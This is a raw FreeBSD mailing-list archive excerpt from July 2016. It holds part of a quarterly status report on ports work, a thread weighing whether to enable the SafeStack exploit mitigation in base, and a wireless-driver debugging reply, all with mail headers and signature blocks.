3 technologies, but with a GNOME 2 look and feel. GNOME 3.20 was ported with help from Ruslan Makhmatkhanov and Gustau Perez. Work is being done on updating GDM from the old 3.16 version to the 3.20 version. For some reason, scrollbars in Firefox are no longer working, though this has not been investigated. With Gtk+ 3.20, theme support was again changed, and the changes are not backwards compatible. If you have a theme update that requires the new Gtk+ version, feel free to add it as a blocker bug to the GNOME/Gtk+ 3.20 update bug. This bug will be used for the exp-run of GNOME 3.20, when it is ready, and to track the theme-related ports. Also, there is a problem with the open and save dialog content going invisible. Open tasks: 1. Finish GDM 3.20 porting. 2. Investigate why the scrollbars in Firefox are missing and why the open/save dialog content is missing. __________________________________________________________________ Intel Networking Tools Contact: Sergey Kozlov Several tools for Intel(R) Ethernet networking products are now available as ports and packages for FreeBSD: * sysutils/intel-nvmupdate: An application that is used to update non-volatile memory on XL710- and X710-based network devices. * sysutils/intel-qcu: An application used to switch QSFP+ ports between 1x40Gbps and 4x10Gbps mode on XL710-based network devices. * net/intel-ixl-kmod: An updated driver which enables the tools support on FreeBSD-10.x. This project was sponsored by Intel Corporation. Open tasks: 1. FreeBSD 11 support is under development and will be included in the next release. __________________________________________________________________ IPv6 Promotion Campaign Links Wiki Page URL: https://wiki.FreeBSD.org/IPv6PortsTODO Contact: Torsten Z=FChlsdorff Half a year ago, I started a promotion campaign to improve support for fetching ports via IPv6. Research performed in December 2015 showed that 10,308 of 25,522 ports were not fetchable when using IPv6-only, as these ports ignore the FreeBSD.org pkg mirror. As a result of the campaign, the following servers now successfully support IPv6: 1. mirror.amdmi3.ru 2. vault.centos.org 3. mirror.centos.org 4. gstreamer.freedesktop.org 5. people.FreeBSD.org This enables 711 more ports to be fetched via IPv6. I would like to thank Wolfgang Zenker, who is very active in supporting the adoption of IPv6. During the latest RIPE meeting, he brought up the topic of non-support of IPv6 being a hindrance to business. I am hopeful that his talk changed some more minds and will help widen the support of IPv6. __________________________________________________________________ KDE on FreeBSD Links KDE on FreeBSD Website URL: https://freebsd.kde.org/ KDE Ports Staging Area URL: https://freebsd.kde.org/area51.php KDE on FreeBSD Wiki URL: https://wiki.FreeBSD.org/KDE KDE/FreeBSD Mailing List URL: https://mail.kde.org/mailman/listinfo/kde-freebsd Development Repository for Integrating KDE 5 URL: http://src.mouf.net/area51/log/branches/plasma5 Development Repository for Integrating Qt 5.6 URL: http://src.mouf.net/area51/log/branches/qt-5.6 Development Repository for Integrating Qt 5.7 URL: http://src.mouf.net/area51/log/branches/qt-5.7 Contact: KDE on FreeBSD team The KDE on FreeBSD team focuses on packaging and improving the user experience of KDE and Qt on FreeBSD. Many updates were committed to the ports tree this quarter, and even more were committed to our experimental ports repository. Tobias Berner, Adriaan de Groot, and Ralf Nolden were responsible for most of the work. The following notable updates landed in the ports tree this quarter: * The CMake ports were updated to 3.5.1 and 3.5.2. * The DigiKam ports were updated to 4.14.0. * The KDevelop ports were updated to 4.7.3. * The devel/qbs port was added for Qt's future build system, QBS. * Qt Creator was updated to 3.4.0, 3.5.0, 3.5.1, 3.6.0, 4.0.0, 4.0.1, and 4.0.2. * A new port misc/qt5-examples was added for the project examples provided by Qt. This makes Qt Creator more functional. * A new port misc/qt5-doc was added for Qt's API documentation, used by Qt Creator and other programs. * The base KDE4 ports were updated to 4.14.10. The following work occurred in our development repository: * Created ports for Qt 5.6.1-1 (branches/qt-5.6). * Created ports for Qt 5.7.0 (branches/qt-5.7). * The plasma5 branch is up-to-date with KDE's upstream and contains ports for Frameworks 5.24.0, Plasma Desktop 5.7.0, and Applications 16.04.2 (branches/plasma5). __________________________________________________________________ Obsoleting Rails 3 Contact: Torsten Z=FChlsdorff Ruby on Rails is the base for most of the rubygems in the Ports Collection. Currently, versions 3.2 and 4.2 coexist. Since Rails 3.2 is running out of support, the time has come to switch to 4.2. While there is ongoing progress to remove Rails 3.2 from the ports tree, there are some ports for which this is a major update that blocks the overall process. The most recent blocker was the outstanding update of www/redmine from 2.6 to 3.2. This has completed successfully, so we can now move on. To help with porting or testing, feel free to contact me or the ruby@FreeBSD.org mailing list. __________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQGgBAEBCgAGBQJXmXSQAAoJECjZpvNk63USVmcMHiiijppbDx1Q2MDhPiC+TOEV QkmBzDwG92TQPWUDbDFr9CTgeNY9jyq2EhvZ3A7kJu1bMOq8ENDugXdb4o4gwXVT 6jWYhhs6dHiFF9XbV/8u8ShfRTp9v4kXXxgPnHxviMI1sDAeokjEQs9ooAA0Z4q7 cx/qzDyDvJazlKT2zIzOxEfcf1ItdDOouMMEi+bhX1olaRX6d3/PuOxfu+xM8W25 hUI+g4fa1MftCPe2nnFYfPZ7/Gaizs60OWieoTCJbTFTTk9dwDJ5fE281zPGajR+ T8ORjWdbt9kzjQP+PKij/trcpwBKIIYlctyWZ6Por2e3AYb14dj5tun8GXgbg352 S2lQdkkKl6WSKM/z5e2TtR4egqs+W+BaRpgaRHBSdeHuUbUrpjW2uMIR4F2qPIqt vw76DxZm2i0thuWkPJKxKFsK+R/nPK4r75eAVkrJ00IPQBm3iLiO3n6l0eUWiAC+ f5Mm/dhA6RgRkPCf/Kx/24QX84vTx+8F3B3cPzXR+Ade04k=3D =3DbO9i -----END PGP SIGNATURE----- From owner-freebsd-current@freebsd.org Thu Jul 28 07:38:01 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 78CC7BA5313 for ; Thu, 28 Jul 2016 07:38:01 +0000 (UTC) (envelope-from theraven@FreeBSD.org) Received: from theravensnest.org (theraven.freebsd.your.org [216.14.102.27]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "cloud.theravensnest.org", Issuer "StartCom Class 1 DV Server CA" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 539C4145D; Thu, 28 Jul 2016 07:38:00 +0000 (UTC) (envelope-from theraven@FreeBSD.org) Received: from [192.168.0.7] (cpc91230-cmbg18-2-0-cust661.5-4.cable.virginm.net [82.1.230.150]) (authenticated bits=0) by theravensnest.org (8.15.2/8.15.2) with ESMTPSA id u6S7bfnI093531 (version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256 verify=NO); Thu, 28 Jul 2016 07:37:51 GMT (envelope-from theraven@FreeBSD.org) X-Authentication-Warning: theravensnest.org: Host cpc91230-cmbg18-2-0-cust661.5-4.cable.virginm.net [82.1.230.150] claimed to be [192.168.0.7] Content-Type: multipart/signed; boundary="Apple-Mail=_01EDCB89-1B0D-48B4-9082-E85ED17EB3E0"; protocol="application/pkcs7-signature"; micalg=sha1 Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Subject: Re: SafeStack in base From: David Chisnall In-Reply-To: <20160727225527.GG13428@mutt-hardenedbsd> Date: Thu, 28 Jul 2016 08:37:35 +0100 Cc: freebsd-current@freebsd.org, emaste@freebsd.org Message-Id: <9F71156A-DF73-4577-B185-AB2502672A63@FreeBSD.org> References: <20160727225527.GG13428@mutt-hardenedbsd> To: Shawn Webb X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 07:38:01 -0000 --Apple-Mail=_01EDCB89-1B0D-48B4-9082-E85ED17EB3E0 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=utf-8 On 27 Jul 2016, at 23:55, Shawn Webb wrote: >=20 > I'm interested in getting SafeStack working in FreeBSD base. Below is = a > link to a simplistic (maybe too simplistic?) patch to enable = SafeStack. > The patch applies against HardenedBSD's hardened/current/master = branch. > Given how simple the patch is, it'd be extremely easy to port over to > FreeBSD (just line numbers would change). We=E2=80=99ve worked with the authors of the SafeStack work. There are = some changes to libc and a few other support libraries needed for it to = work, which are in the GitHub repository. They=E2=80=99ve also done = some work to address issues of things like Firefox and v8 that need to = be able to walk the stack, allocate their own stacks for userspace = threads, and so on. It was not enabled for FreeBSD 11 because SafeStack imposes a lot of = long-term ABI constraints that it=E2=80=99s not clear we want to support = indefinitely given the =E2=80=98Missing the point(er)=E2=80=99 Oakland = paper last year. It does increase the work factor for attackers, so has = some security benefit, but if bypassing it is something that=E2=80=99s = going to be added to exploit toolkits then it=E2=80=99s little practical = benefit. One middle-ground that we=E2=80=99ve considered is only supporting it = for statically linked binaries. This absolves us of the need to support = the ABI indefinitely, and still provides a lot of the benefit. David --Apple-Mail=_01EDCB89-1B0D-48B4-9082-E85ED17EB3E0 Content-Disposition: attachment; filename=smime.p7s Content-Type: application/pkcs7-signature; name=smime.p7s Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIK5jCCBPww ggPkoAMCAQICECJrrb9nBol9MHok/UZg/AYwDQYJKoZIhvcNAQELBQAwdTELMAkGA1UEBhMCSUwx FjAUBgNVBAoTDVN0YXJ0Q29tIEx0ZC4xKTAnBgNVBAsTIFN0YXJ0Q29tIENlcnRpZmljYXRpb24g QXV0aG9yaXR5MSMwIQYDVQQDExpTdGFydENvbSBDbGFzcyAxIENsaWVudCBDQTAeFw0xNjA0MTkw OTI3NDJaFw0xNzA0MTkwOTI3NDJaMEQxHTAbBgNVBAMMFHRoZXJhdmVuQGZyZWVic2Qub3JnMSMw IQYJKoZIhvcNAQkBFhR0aGVyYXZlbkBmcmVlYnNkLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEP ADCCAQoCggEBALsL5pEhrGjrswHVdMHWhgxb8ARKDYRePSqpDLmjJ40bpx+n1zrvIwjC2Vk2IpoD 04rg5Pog2IrhnX+Qk2NSXzBXWj2JAaTc9OtSeAY0BtgJYXONGONQbRKVy97QBdzd1SbMEzDrOgH5 UDI+5sF1PboOTmLyTAPI9273XdfZ0BnstUXs8NXr/7p9E5CWJOsO1iQcINbm4XiwC1PLNMeWUknE Nji/hFKwcE8IFtaUe1ymbw6yA3rBpDu3KewIRD1T66FPTZJeIzvUoBIqWd+GAOfCBG2QYmbc3y/x K2hCtcXThcB1uVFA2q39koLKA8wHyqv4Jhm3wzhAqKDsWK4bGW0CAwEAAaOCAbcwggGzMA4GA1Ud DwEB/wQEAwIEsDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwCQYDVR0TBAIwADAdBgNV HQ4EFgQU5J3Kc8GeW8pEGxBkcMoA7eUOPRwwHwYDVR0jBBgwFoAUJIFsOWG+SQ+PtxtGK8kotSdI bWgwbwYIKwYBBQUHAQEEYzBhMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5zdGFydHNzbC5jb20w OQYIKwYBBQUHMAKGLWh0dHA6Ly9haWEuc3RhcnRzc2wuY29tL2NlcnRzL3NjYS5jbGllbnQxLmNy dDA4BgNVHR8EMTAvMC2gK6AphidodHRwOi8vY3JsLnN0YXJ0c3NsLmNvbS9zY2EtY2xpZW50MS5j cmwwHwYDVR0RBBgwFoEUdGhlcmF2ZW5AZnJlZWJzZC5vcmcwIwYDVR0SBBwwGoYYaHR0cDovL3d3 dy5zdGFydHNzbC5jb20vMEYGA1UdIAQ/MD0wOwYLKwYBBAGBtTcBAgUwLDAqBggrBgEFBQcCARYe aHR0cDovL3d3dy5zdGFydHNzbC5jb20vcG9saWN5MA0GCSqGSIb3DQEBCwUAA4IBAQBSBDH+kZf5 bZkNFcMSPdfnGC7F8utBIxs2bi3JQjsBoQTm1vnXdwgINSfO9At6iQZHoEyj8ZE6PcMFuEU0+bk0 aE8aYcW59WnxfWx943upZoMhX0YVaJcFK01EHFrddRAP44sh7Eu6JtdFuAG+6btDReMcg35Qm65X 7/280aVm7awadJ+IQs8r9qBVk2NFqkvHCETtJjNWXd7M6mcsfXstvykbubPQH/VNW/zrX6yzIcI4 aoz+Sn8RJmHNkk6cImqe1KvsdDLXmqCoeoMwos62pT18RaI//jwTdmnf5EHFMlevnxOr7rzA++71 OSZfdYf6+nvHOod1F721rNuy6lxFMIIF4jCCA8qgAwIBAgIQa6eKfQrXiNZRCvlZ5Oe04TANBgkq hkiG9w0BAQsFADB9MQswCQYDVQQGEwJJTDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjErMCkGA1UE CxMiU2VjdXJlIERpZ2l0YWwgQ2VydGlmaWNhdGUgU2lnbmluZzEpMCcGA1UEAxMgU3RhcnRDb20g Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTUxMjE2MDEwMDA1WhcNMzAxMjE2MDEwMDA1WjB1 MQswCQYDVQQGEwJJTDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20g Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkxIzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50 IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvX3a98OifYP2W4L921tfrh4bdcC1 Ga+YJKy7V3nYNewJHnzMlBsK0Hb8Dm4Wo3FZpylcYa1MJGT10QMGWaLER3xCIuRR+8eklf/EqeZW RLojJ7zBRtjMywPOCelrOU+DX12dKp+Ez4J6919rz1UudTO1GvZyCYJ/I7062uHsskM8b7gPxmcC oO1UHwwpgkvpCArJWGFoFzjLdsZbErJcS3HtAhlkbE/BKTMrdYg35Uo12SLBO5tbk8h2imbKTC8i Ms+pskrvI/AVlh6QoTTXk6xboVX6zgMgzxSVVLymQiygYYm0y5aMsvi2raFhC643SOGvErWWPPnS EfbeAD1xswIDAQABo4IBZDCCAWAwDgYDVR0PAQH/BAQDAgEGMB0GA1UdJQQWMBQGCCsGAQUFBwMC BggrBgEFBQcDBDASBgNVHRMBAf8ECDAGAQH/AgEAMDIGA1UdHwQrMCkwJ6AloCOGIWh0dHA6Ly9j cmwuc3RhcnRzc2wuY29tL3Nmc2NhLmNybDBmBggrBgEFBQcBAQRaMFgwJAYIKwYBBQUHMAGGGGh0 dHA6Ly9vY3NwLnN0YXJ0c3NsLmNvbTAwBggrBgEFBQcwAoYkaHR0cDovL2FpYS5zdGFydHNzbC5j b20vY2VydHMvY2EuY3J0MB0GA1UdDgQWBBQkgWw5Yb5JD4+3G0YrySi1J0htaDAfBgNVHSMEGDAW gBROC+8apEBbpRdphzDKNGhD0EGu8jA/BgNVHSAEODA2MDQGBFUdIAAwLDAqBggrBgEFBQcCARYe aHR0cDovL3d3dy5zdGFydHNzbC5jb20vcG9saWN5MA0GCSqGSIb3DQEBCwUAA4ICAQCL4/eH7AGL hK0PAQJbnOEjJyMEvTTwcAJuUh/bodjQl06u4putYOxdSyIjSP/sKt+31LmjG8+IO1WqykE4H/Lm 7NKezWVnCHuwb3ptgFmlwbMbGkU2MOZBtwzfKXdYUhFLhaE2uw5jXhXvLYitQay962wP5uPI6eAI hV4L8aaya1u4s7MnrTq0Rz25FuGNO79vTHYWj797tSRC8rM16js4yGKOLFpQvIg0F8IElv57b1st p+C7omqM5Qn15dePbSnqr8Jb65WtmJJbnv6rlqfY/aLuE/zmNAlzLmPgfMDStKIXdg+EoYBZTEo8 wBUaBxihfNbJ069ndQOxMNNqBelEMgpAtmjTbCuXFjqIwWq+XOx6ZV/Wh2FAmaLsSHlNvEjjSQMZ wE4EeHCdo66ZmEs/5JYlCeOkulKVQ6P3m5/XOj2jP17Q2AgmjP+11+sHN7PvrG0OwrQp9QMe3X+r n0G8MjtFfqBWvR9CgLIxzM3MJNxFdgdjS2rYnShP5uxvqwfZvhZVYCIkqdJhpYON0DvSodfiar0w iM79mySZJjzC0CTbiisBzS/BeBhqeo2wFfli/iw3hn1XKvAx0ty6w/scmBF0AYqmRHYj1TjMSw0l Al7AztLglqWjUPI+sukvadMRPxmtKXlS2nVR4an/Z16imsZ69+fFYH68c1CK7zmjozGCA04wggNK AgEBMIGJMHUxCzAJBgNVBAYTAklMMRYwFAYDVQQKEw1TdGFydENvbSBMdGQuMSkwJwYDVQQLEyBT dGFydENvbSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEjMCEGA1UEAxMaU3RhcnRDb20gQ2xhc3Mg MSBDbGllbnQgQ0ECECJrrb9nBol9MHok/UZg/AYwCQYFKw4DAhoFAKCCAZkwGAYJKoZIhvcNAQkD MQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMTYwNzI4MDczNzM2WjAjBgkqhkiG9w0BCQQx FgQUqvA6VmYVaAzwzwqFEOZugJpCx3QwgZoGCSsGAQQBgjcQBDGBjDCBiTB1MQswCQYDVQQGEwJJ TDEWMBQGA1UEChMNU3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20gQ2VydGlmaWNhdGlv biBBdXRob3JpdHkxIzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50IENBAhAia62/ZwaJ fTB6JP1GYPwGMIGcBgsqhkiG9w0BCRACCzGBjKCBiTB1MQswCQYDVQQGEwJJTDEWMBQGA1UEChMN U3RhcnRDb20gTHRkLjEpMCcGA1UECxMgU3RhcnRDb20gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkx IzAhBgNVBAMTGlN0YXJ0Q29tIENsYXNzIDEgQ2xpZW50IENBAhAia62/ZwaJfTB6JP1GYPwGMA0G CSqGSIb3DQEBAQUABIIBAC0tdW3t8P6tHRc7U6H4f6xS+g+p0nLzY+yXgP8eNDoCI5Bck9wPeLEG /xZ+Ou212OS2wsARAg20PVbcmT/GiU5qGMaEUuqqJTLqrg7YxXegca3G3ksqI8/HcjxcCjl6Kh1P N0n7DXO5zpUwEEZbYPgKdd+82rCqr8NMxRGJ2oCsQKTuCSuxp67Pv1R+MAcyfyMo44qGMGJRn+hw iRjOhW0iRXZsRGXxtqsBY9GNjzMdXens32f0szr5Pcp3zfnYHNRkA9fH328SQn7BR6ehxuRQZTVh SKRBYIIlQvc56Gd4CehUzuogFZ4ev+x0Uzje54qogmxtex+dc5q93fqPAQgAAAAAAAA= --Apple-Mail=_01EDCB89-1B0D-48B4-9082-E85ED17EB3E0-- From owner-freebsd-current@freebsd.org Thu Jul 28 08:05:31 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 18387BA5AA8 for ; Thu, 28 Jul 2016 08:05:31 +0000 (UTC) (envelope-from ed@nuxi.nl) Received: from mail-yw0-x22f.google.com (mail-yw0-x22f.google.com [IPv6:2607:f8b0:4002:c05::22f]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id D48191EF5 for ; Thu, 28 Jul 2016 08:05:30 +0000 (UTC) (envelope-from ed@nuxi.nl) Received: by mail-yw0-x22f.google.com with SMTP id u134so79834339ywg.3 for ; Thu, 28 Jul 2016 01:05:30 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=nuxi-nl.20150623.gappssmtp.com; s=20150623; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-transfer-encoding; bh=hc5ZjgD/cgDxHaKjv6AU6K++rL5zrGCOgnWSZcyhPOM=; b=IQKGSHhPhjPjuDsUnz++25BKaMUuxz3vbV+M6z4SJ3R5DI8Fd2E6050i87c/DsCdus oAo7VTc2/8lmReYmYXudszWYHP9TB/0kI/t3TPYWVpNjInXlWMgmitUbFIW/wl+AmYYA Ac3mzbVkfXQPdDCPGxfrpX4Cy/LpEeVL9cddeCyOSvfu1S8xxgYn1f+KRlOOnj3my//P UBwdq+M2t3ee65PcJuHJ9awhRAf8YDD2SYOtDGsjh80zo7EcjBjCcmVDOqJicweTSe8y CzxMs7S1gWPfyTrtL7k/Odry7GlV7Y7G9QRBGNPJeKXfzuV7oR3f84iw7jaKiMrdTJrw YQRQ== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc:content-transfer-encoding; bh=hc5ZjgD/cgDxHaKjv6AU6K++rL5zrGCOgnWSZcyhPOM=; b=V8bI56CNMcy7Azy6BqHOj3EKR1v/YPvAhyahHcL0AVO1Xbmnx+BOQrpQpyl3Hd0H6T VbhXYlb8F1YhKd4WWnx7lLI64DrLGjKXMLu+hX631CUpihaXkCxHjzRf9RftYdzWAxJ5 sWz5+TdKEXY6hH8wYCQDal+TFb7G8p0Ywd6oKpOH2/rjFJ+AHv+KxKx8bZHT7VyalG5v TU19EAQYB3PHvVQ4j5fQemDBPrlrYClnAmPMkWIH75+uBedmsDFNHRzwwpPGnDfAIRxI W63bvPEoDuECnkcujUeatWe5eRp8zdJDlL6SLKu/t1vb245xrZparTlu2G7y1xZ6yXSi PmKg== X-Gm-Message-State: AEkoousG+jEkTh5x/Q2a2sSEAFeKKgJ/N39iraqtQzl1+/mLETf9sBqrlNj8KNUDY0Dxihsfuek5ihNJvQaSUg== X-Received: by 10.129.122.7 with SMTP id v7mr27862335ywc.219.1469693129736; Thu, 28 Jul 2016 01:05:29 -0700 (PDT) MIME-Version: 1.0 Received: by 10.13.201.71 with HTTP; Thu, 28 Jul 2016 01:05:29 -0700 (PDT) In-Reply-To: References: <20160727225527.GG13428@mutt-hardenedbsd> From: Ed Schouten Date: Thu, 28 Jul 2016 10:05:29 +0200 Message-ID: Subject: Re: SafeStack in base To: "Conrad E. Meyer" Cc: Shawn Webb , freebsd-current , Ed Maste Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 08:05:31 -0000 Hi Conrad, 2016-07-28 2:02 GMT+02:00 Conrad Meyer : > The problem appears to be an upstream limitation of > -fsanitize=3Dsafe-stack: "Most programs, static libraries, or individual > files can be compiled with SafeStack as is. =E2=80=A6 Linking a DSO with > SafeStack is not currently supported." [0] I'm not sure, but I thought the reason for this is due to the fact that SafeStack uses some kind of additional library to wrap around pthread_create() to create threads that have SafeStack properly set up. If we were to actually integrate this functionality into our C runtime/pthread library to create threads with two stacks by default, then I couldn't think of a reason why it shouldn't work with DSOs. SafeStack merely depends on an additional TLS variable -- nothing else. --=20 Ed Schouten Nuxi, 's-Hertogenbosch, the Netherlands KvK-nr.: 62051717 From owner-freebsd-current@freebsd.org Thu Jul 28 09:12:54 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 692B4BA6E31; Thu, 28 Jul 2016 09:12:54 +0000 (UTC) (envelope-from andriyvos@gmail.com) Received: from mail-lf0-f50.google.com (mail-lf0-f50.google.com [209.85.215.50]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id CD6C9177C; Thu, 28 Jul 2016 09:12:53 +0000 (UTC) (envelope-from andriyvos@gmail.com) Received: by mail-lf0-f50.google.com with SMTP id g62so44889713lfe.3; Thu, 28 Jul 2016 02:12:53 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:to:subject:references:date:cc:mime-version :content-transfer-encoding:from:message-id:in-reply-to:user-agent; bh=FZ9xepUbKiA7Qy64JYoI3ShNrSbaPM11rKkRTRWagU8=; b=ahyLUABgSt96x6gOaayaEIqhzMj+/66LoS7Xlgu1JblHyYlaS3DJOEDdlGXnqpqpJ8 kPV7454WF7rc0GiVzWIHGL7IED/8kYAUx0NR23DvYcXexKfA6AHz7KeLVcFGjg+mTyvc InKjqemE3zbGwWkcRiwX5xG6g44OQnMDCfmazWZ94nXQHRscZMJl8vNNedCbaT1uu1Z0 Qzt9s9udLU2oBBsTO83oLw9WuluI/20cXPzsfwIXXzNubg1rEXeBgHXCZfw2CBuJ25fn +UTyecq9J7wTT28qaEtGp+qhuttQI6TOIbn5emQH1ffdeAV91sOFOcrPu9SuM1TdfqzX iNSw== X-Gm-Message-State: AEkooutzBxhCBvs8D29NXkXyS+sjtE4m3aUU0iD2S74+5MGlWqgp/nHxC1kPf3qtIXG1iQ== X-Received: by 10.25.90.198 with SMTP id o189mr11220257lfb.193.1469697166188; Thu, 28 Jul 2016 02:12:46 -0700 (PDT) Received: from localhost (host-176-37-109-22.la.net.ua. [176.37.109.22]) by smtp.gmail.com with ESMTPSA id u70sm1723502lja.15.2016.07.28.02.12.45 (version=TLS1 cipher=AES128-SHA bits=128/128); Thu, 28 Jul 2016 02:12:45 -0700 (PDT) Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes To: "Larry Rosenman" Subject: Re: IWM(7260), no connect References: <20160728023954.GA1321@pita> Date: Thu, 28 Jul 2016 12:12:42 +0300 Cc: freebsd-wireless@freebsd.org, freebsd-current@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: Quoted-Printable From: "Andriy Voskoboinyk" Message-ID: In-Reply-To: <20160728023954.GA1321@pita> User-Agent: Opera Mail/12.16 (FreeBSD) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 09:12:54 -0000 Thu, 28 Jul 2016 05:39:55 +0300 =D0=B1=D1=83=D0=BB=D0=BE =D0=BD=D0=B0=D0= =BF=D0=B8=D1=81=D0=B0=D0=BD=D0=BE Larry Rosenman = : Try to revert r303418 (as I can see, r303416 and/or r303413 are not the = = reason of this). In case, if this will not help, you can try to add wlandebug_wlan0=3D"state+scan+auth+assoc" into rc.conf to see where it fails. > I'm running today's top of tree, and it doesn't seem to want to connec= t: > > > re0: flags=3D8843 metric 0 mtu= 1500 > options=3D8209b > ether 20:47:47:73:07:5f > inet6 fe80::2247:47ff:fe73:75f%re0 prefixlen 64 scopeid 0x1 > inet6 2001:470:1f0f:42c:2247:47ff:fe73:75f prefixlen 64 autoconf > inet 192.168.200.246 netmask 0xfffffc00 broadcast 192.168.203.255 > nd6 options=3D23 > media: Ethernet autoselect (1000baseT ) > status: active > lo0: flags=3D8049 metric 0 mtu 16384 > options=3D600003 > inet6 ::1 prefixlen 128 > inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 > inet 127.0.0.1 netmask 0xff000000 > nd6 options=3D21 > groups: lo > wlan0: flags=3D8c43 me= tric = > 0 mtu 1500 > ether 58:91:cf:1a:45:69 > inet6 fe80::5a91:cfff:fe1a:4569%wlan0 prefixlen 64 scopeid 0x3 > nd6 options=3D23 > media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) > status: no carrier > ssid "" channel 8 (2447 MHz 11g) > regdomain FCC country US authmode WPA1+WPA2/802.11i privacy ON > deftxkey UNDEF txpower 30 bmiss 10 scanvalid 60 protmode CTS wme > roaming MANUAL > groups: wlan > > > hostb0@pci0:0:0:0: class=3D0x060000 card=3D0x07061028 chip=3D0x1910808= 6 = > rev=3D0x07 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Skylake Host Bridge/DRAM Registers' > class =3D bridge > subclass =3D HOST-PCI > pcib1@pci0:0:1:0: class=3D0x060400 card=3D0x20158086 chip=3D0x19018086= = > rev=3D0x07 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Skylake PCIe Controller (x16)' > class =3D bridge > subclass =3D PCI-PCI > pcib2@pci0:0:1:1: class=3D0x060400 card=3D0x07061028 chip=3D0x19058086= = > rev=3D0x07 hdr=3D0x01 > vendor =3D 'Intel Corporation' > device =3D 'Skylake PCIe Controller (x8)' > class =3D bridge > subclass =3D PCI-PCI > vgapci1@pci0:0:2:0: class=3D0x030000 card=3D0x07061028 chip=3D0x191b80= 86 = > rev=3D0x06 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'HD Graphics 530' > class =3D display > subclass =3D VGA > none0@pci0:0:4:0: class=3D0x118000 card=3D0x07061028 chip=3D0x19038086= = > rev=3D0x07 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Skylake Processor Thermal Subsystem' > class =3D dasp > xhci0@pci0:0:20:0: class=3D0x0c0330 card=3D0x07061028 chip=3D0xa12f808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H USB 3.0 xHCI Controller' > class =3D serial bus > subclass =3D USB > none1@pci0:0:20:2: class=3D0x118000 card=3D0x07061028 chip=3D0xa131808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H Thermal subsystem' > class =3D dasp > none2@pci0:0:21:0: class=3D0x118000 card=3D0x07061028 chip=3D0xa160808= 6 = > rev=3D0x31 hdr=3D0x00 > vendor =3D 'Intel Corporation' > device =3D 'Sunrise Point-H Serial IO I2C Controller' > class =3D dasp > 